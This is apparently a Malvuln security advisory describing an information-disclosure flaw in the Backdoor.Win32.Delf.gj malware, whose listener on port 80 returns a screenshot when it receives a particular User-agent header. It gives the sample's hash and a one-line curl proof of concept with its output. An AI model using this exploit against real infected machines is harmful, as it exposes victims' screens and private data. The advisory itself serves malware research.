Backdoor.Win32.Delf.gj MVID-2022-0663 Information Disclosure

Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/8872c2ec49ff3382240762a029631684.txt

Contact: [email protected]

Media: twitter.com/malvuln

Backup media: infosec.exchange/@malvuln

Threat: Backdoor.Win32.Delf.gj

Vulnerability: Information Disclosure

Description: Malware listens to TCP port 80. Third-party attackers who are able to reach infected systems can use “netscreen.jpg”, which is the header User-agent.html in an HTTP request. This allows them screen captures of victim machines.

Family: Delf

Type: PE32

MD5: 8872c2ec49ff3382240762a029631684

Vuln ID: MVID-2022 – 0663

Disclosure: 12/01/2022

Exploit/PoC:

curl http://x.x.x.x -H “User-agent: netscreen.jpg” –output screendump.jpg

% Total Received % Average Speed Time Time

Dload Upload Total Spent Left Speed

100 215k 100 215k 0 0 215k 0 0:00:01 –:–:– 0:00:01 1976k

Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.comTM